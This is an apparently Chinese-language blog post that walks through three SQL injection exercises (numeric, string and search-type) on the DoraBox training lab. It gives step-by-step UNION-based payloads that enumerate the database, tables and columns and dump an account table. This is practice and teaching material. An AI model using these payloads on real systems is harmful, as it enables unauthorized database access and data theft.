<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/slice-fill1.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/slice-fill.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.5.0',
    exturl: false,
    sidebar: {"position":"left","width":280,"display":"post","offset":10,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":true},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: true,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":8},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="前言DoraBox是米斯特安全团推出的一款基础练习靶场，配合米斯特安全团队的教学视频练习可以快速入门，更易理解Web漏洞的实现， 这里使用DoraBox探究基本的三个SQL注入漏洞。">
<meta name="keywords" content="Web,靶场练习,sql注入,Web渗透">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入_DoraBox靶场">
<meta property="og:url" content="https://github.com/GgBoom-993/blog/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/index.html">
<meta property="og:site_name" content="GgBoom993&#39;s Blog">
<meta property="og:description" content="前言DoraBox是米斯特安全团推出的一款基础练习靶场，配合米斯特安全团队的教学视频练习可以快速入门，更易理解Web漏洞的实现， 这里使用DoraBox探究基本的三个SQL注入漏洞。">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg1.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg2.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg3.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg4.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg5.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg6.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg7.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg8.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg9.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg11.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg22.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg33.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg44.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg55.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg66.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg111.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg222.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg333.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg444.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg555.PNG">
<meta property="og:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg777.PNG">
<meta property="og:updated_time" content="2020-06-30T10:09:47.296Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入_DoraBox靶场">
<meta name="twitter:description" content="前言DoraBox是米斯特安全团推出的一款基础练习靶场，配合米斯特安全团队的教学视频练习可以快速入门，更易理解Web漏洞的实现， 这里使用DoraBox探究基本的三个SQL注入漏洞。">
<meta name="twitter:image" content="https://github.com/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg1.PNG">

<link rel="canonical" href="https://github.com/GgBoom-993/blog/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>SQL注入_DoraBox靶场 | GgBoom993's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">GgBoom993's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-书单">

    <a href="/book/" rel="section"><i class="fa fa-fw fa-book"></i>书单</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/GgBoom-993/blog/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/timg1.jpg">
      <meta itemprop="name" content="GgBoom993">
      <meta itemprop="description" content="无名小卒">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="GgBoom993's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL注入_DoraBox靶场
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-11-02 01:12:28" itemprop="dateCreated datePublished" datetime="2019-11-02T01:12:28+08:00">2019-11-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-06-30 18:09:47" itemprop="dateModified" datetime="2020-06-30T18:09:47+08:00">2020-06-30</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/学习笔记/" itemprop="url" rel="index">
                    <span itemprop="name">学习笔记</span>
                  </a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>1.9k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>2 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>DoraBox是米斯特安全团推出的一款基础练习靶场，配合米斯特安全团队的教学视频练习可以快速入门，更易理解Web漏洞的实现，</p>
<p>这里使用DoraBox探究基本的三个SQL注入漏洞。</p>
<a id="more"></a>

<h1 id="DoraBox-SQLi数字型"><a href="#DoraBox-SQLi数字型" class="headerlink" title="DoraBox_SQLi数字型"></a>DoraBox_SQLi数字型</h1><h2 id="过程"><a href="#过程" class="headerlink" title="过程"></a>过程</h2><h3 id="进入SQLi数字型的注入页面"><a href="#进入SQLi数字型的注入页面" class="headerlink" title="进入SQLi数字型的注入页面"></a>进入SQLi数字型的注入页面</h3><img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg1.PNG" title="timg">

<p>很简单的页面</p>
<!--more-->

<h3 id="初步判断"><a href="#初步判断" class="headerlink" title="初步判断"></a>初步判断</h3><p>先点击submit看结果，这里显示出了SQL执行语句 如下</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg2.PNG" title="timg">

<p>好接下来 传入id 并观察页面返回 页面返回正常 如下</p>
<p>1 and 1=1</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg3.PNG" title="timg">

<p>接着观察，页面返回出错 如下</p>
<p>1 and 1=2</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg4.PNG" title="timg">

<h3 id="爆字段"><a href="#爆字段" class="headerlink" title="爆字段"></a>爆字段</h3><p>1 order by 3 返回正常 1 order by 4 返回错误 所以前者正确</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg5.PNG" title="timg">

<h3 id="爆库名，用户"><a href="#爆库名，用户" class="headerlink" title="爆库名，用户"></a>爆库名，用户</h3><p>-1 union select 1,database(),user()</p>
<p>可以看见 库名为 pentest 用户为 root@localhost</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg6.PNG" title="timg">

<h3 id="爆表名"><a href="#爆表名" class="headerlink" title="爆表名"></a>爆表名</h3><p>-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()</p>
<p>可以看见有两张表 account 和 news</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg7.PNG" title="timg">

<h3 id="爆列名"><a href="#爆列名" class="headerlink" title="爆列名"></a>爆列名</h3><p>-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’account’</p>
<p>可以看见三个列名 id rest own</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg8.PNG" title="timg">

<h3 id="爆内容"><a href="#爆内容" class="headerlink" title="爆内容"></a>爆内容</h3><p>-1 union select 1,2,concat_ws(‘|’,id,rest,own) from account</p>
<p>可以看见各列内容 至此本次练习结束</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg9.PNG">

<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>DoraBox漏洞练习平台，难度不高，覆盖面广，包含多种常见Web漏洞环境，作为基础练习能很快上手。</p>
<p>本次练习为DoraBox漏洞练习平台中非常基础的SQli数字型注入</p>
<p>DoraBox项目地址：<a href="https://github.com/gh0stkey/DoraBox">https://github.com/gh0stkey/DoraBox</a></p>
<h1 id="DoraBox-SQLi字符型"><a href="#DoraBox-SQLi字符型" class="headerlink" title="DoraBox_SQLi字符型"></a>DoraBox_SQLi字符型</h1><h2 id="过程-1"><a href="#过程-1" class="headerlink" title="过程"></a>过程</h2><h3 id="进入页面，先submit看一下"><a href="#进入页面，先submit看一下" class="headerlink" title="进入页面，先submit看一下"></a>进入页面，先submit看一下</h3><img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg11.PNG" title="timg">

<p>这里可以看见SQL语句：SELECT * FROM news WHERE title=’DoraBox’</p>
<p>猜测需要闭合单引号。用 and 1=1 验证</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg22.PNG" title="timg">

<p>猜测正确，可以继续。</p>
<p>之后大致过程与数字型一样，只要注意最后单引号的闭合即可，或者可以用#注释</p>
<h3 id="爆库名，用户-1"><a href="#爆库名，用户-1" class="headerlink" title="爆库名，用户"></a>爆库名，用户</h3><p>DoraBox’ and ‘1’ =’2’ union select 1,database(),user()#</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg33.PNG" title="timg">

<h3 id="爆表名-1"><a href="#爆表名-1" class="headerlink" title="爆表名"></a>爆表名</h3><p>DoraBox’ and ‘1’ =’2’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’pentest’#</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg44.PNG" title="timg">

<h3 id="爆列名-1"><a href="#爆列名-1" class="headerlink" title="爆列名"></a>爆列名</h3><p>DoraBox’ and ‘1’ =’2’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’account’#</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg55.PNG" title="timg">

<h3 id="爆内容-1"><a href="#爆内容-1" class="headerlink" title="爆内容"></a>爆内容</h3><p>DoraBox’ and ‘1’ =’2’ union select 1,2,concat_ws(‘/‘,id,rest,own) from account #</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg66.PNG" title="timg">

<h2 id="小结-1"><a href="#小结-1" class="headerlink" title="小结"></a>小结</h2><p>同数字型方式大致相同，注意单引号闭合即可</p>
<h1 id="DoraBox-SQLi搜索型"><a href="#DoraBox-SQLi搜索型" class="headerlink" title="DoraBox_SQLi搜索型"></a>DoraBox_SQLi搜索型</h1><h2 id="过程-2"><a href="#过程-2" class="headerlink" title="过程"></a>过程</h2><h3 id="进入页面，先submit看一下SQL语句"><a href="#进入页面，先submit看一下SQL语句" class="headerlink" title="进入页面，先submit看一下SQL语句"></a>进入页面，先submit看一下SQL语句</h3><img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg111.PNG" title="timg">

<p>可以发现，需要闭合 % 和 ‘</p>
<h3 id="构造闭合和显示位"><a href="#构造闭合和显示位" class="headerlink" title="构造闭合和显示位"></a>构造闭合和显示位</h3><p>DoraBox%’ and 1=2 union select 1,2,3#</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg222.PNG" title="timg">

<h3 id="爆库名"><a href="#爆库名" class="headerlink" title="爆库名"></a>爆库名</h3><p>DoraBox%’ and 1=2 union select 1,2,database()#</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg333.PNG" title="timg">

<h3 id="爆表名-2"><a href="#爆表名-2" class="headerlink" title="爆表名"></a>爆表名</h3><p>DoraBox%’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg444.PNG" title="timg">

<h3 id="爆列名-2"><a href="#爆列名-2" class="headerlink" title="爆列名"></a>爆列名</h3><p>DoraBox%’ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’account’#</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg555.PNG" title="timg">

<h3 id="爆数据"><a href="#爆数据" class="headerlink" title="爆数据"></a>爆数据</h3><p>DoraBox%’ and 1=2 union select 1,2,concat_ws(‘/‘,id,rest,own) from account#</p>
<img src="/2019/11/02/DoraBox漏洞练习平台_SQL注入（一）/timg777.PNG" title="timg">

<h2 id="小结-2"><a href="#小结-2" class="headerlink" title="小结"></a>小结</h2><p>自此DoraBox的SQL注入部分全部完成，都是基础操作</p>
<p>SQLi数字型不用闭合，需要传入ID</p>
<p>SQLi字符型需要闭合 ‘</p>
<p>SQLi搜索型需要闭合 % 和 ‘</p>
<p>可见，在进行SQL注入时，要通过错误返回发现SQL执行语句或者大胆猜测SQL执行语句，才能构造完美闭合，达到最终目的。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i>Web</a>
              <a href="/tags/靶场练习/" rel="tag"><i class="fa fa-tag"></i>靶场练习</a>
              <a href="/tags/sql注入/" rel="tag"><i class="fa fa-tag"></i>sql注入</a>
              <a href="/tags/Web渗透/" rel="tag"><i class="fa fa-tag"></i>Web渗透</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
                <a href="/2019/10/30/物理Hacker之Esp8266-deauther/" rel="next" title="物理hacker之Esp8266_deauther">
                  <i class="fa fa-chevron-left"></i> 物理hacker之Esp8266_deauther
                </a>
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
                <a href="/2019/11/04/DoraBox漏洞练习平台-XSS（一）/" rel="prev" title="XSS_DoraBox靶场">
                  XSS_DoraBox靶场 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DoraBox-SQLi数字型"><span class="nav-number">2.</span> <span class="nav-text">DoraBox_SQLi数字型</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#过程"><span class="nav-number">2.1.</span> <span class="nav-text">过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#进入SQLi数字型的注入页面"><span class="nav-number">2.1.1.</span> <span class="nav-text">进入SQLi数字型的注入页面</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#初步判断"><span class="nav-number">2.1.2.</span> <span class="nav-text">初步判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆字段"><span class="nav-number">2.1.3.</span> <span class="nav-text">爆字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆库名，用户"><span class="nav-number">2.1.4.</span> <span class="nav-text">爆库名，用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆表名"><span class="nav-number">2.1.5.</span> <span class="nav-text">爆表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆列名"><span class="nav-number">2.1.6.</span> <span class="nav-text">爆列名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆内容"><span class="nav-number">2.1.7.</span> <span class="nav-text">爆内容</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小结"><span class="nav-number">2.2.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DoraBox-SQLi字符型"><span class="nav-number">3.</span> <span class="nav-text">DoraBox_SQLi字符型</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#过程-1"><span class="nav-number">3.1.</span> <span class="nav-text">过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#进入页面，先submit看一下"><span class="nav-number">3.1.1.</span> <span class="nav-text">进入页面，先submit看一下</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆库名，用户-1"><span class="nav-number">3.1.2.</span> <span class="nav-text">爆库名，用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆表名-1"><span class="nav-number">3.1.3.</span> <span class="nav-text">爆表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆列名-1"><span class="nav-number">3.1.4.</span> <span class="nav-text">爆列名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆内容-1"><span class="nav-number">3.1.5.</span> <span class="nav-text">爆内容</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小结-1"><span class="nav-number">3.2.</span> <span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DoraBox-SQLi搜索型"><span class="nav-number">4.</span> <span class="nav-text">DoraBox_SQLi搜索型</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#过程-2"><span class="nav-number">4.1.</span> <span class="nav-text">过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#进入页面，先submit看一下SQL语句"><span class="nav-number">4.1.1.</span> <span class="nav-text">进入页面，先submit看一下SQL语句</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#构造闭合和显示位"><span class="nav-number">4.1.2.</span> <span class="nav-text">构造闭合和显示位</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆库名"><span class="nav-number">4.1.3.</span> <span class="nav-text">爆库名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆表名-2"><span class="nav-number">4.1.4.</span> <span class="nav-text">爆表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆列名-2"><span class="nav-number">4.1.5.</span> <span class="nav-text">爆列名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆数据"><span class="nav-number">4.1.6.</span> <span class="nav-text">爆数据</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#小结-2"><span class="nav-number">4.2.</span> <span class="nav-text">小结</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="GgBoom993"
      src="/images/timg1.jpg">
  <p class="site-author-name" itemprop="name">GgBoom993</p>
  <div class="site-description" itemprop="description">无名小卒</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">35</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/GgBoom-993" title="GitHub → https://github.com/GgBoom-993"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">GgBoom993</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">83k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">1:16</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.5.0
  </div>
-->


<!-- 在网页底部添加网站运行时间 -->
<span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date();
    function createtime() {
        var grt= new Date("09/30/2019 00:00:00");//此处修改你的建站时间或者网站上线时间
        now.setTime(now.getTime()+250);
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
        document.getElementById("timeDate").innerHTML = "网站已运行 "+dnum+" 天 ";
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒";
    }
setInterval("createtime()",250);
</script>





        












        
      </div>
    </footer>
  </div>

  
  
  <script color='255,255,224' opacity='1' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>













  

  

</body>
</html>
